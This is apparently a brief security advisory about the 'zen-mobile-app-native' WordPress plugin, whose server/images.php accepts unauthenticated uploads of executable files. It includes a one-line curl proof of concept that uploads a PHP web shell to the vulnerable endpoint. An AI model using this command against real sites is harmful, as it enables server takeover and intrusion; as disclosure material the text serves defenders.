The code in file ./zen-mobile-app-native/server/images.php doesn’t require authentication or check that the user is allowed to upload content. It also doesn’t sanitize the file upload against executable code.
$ curl -F “file=@/var/www/shell.php” “http://example.com/wp-content/plugins/zen-mobile-app-native/server/images.php”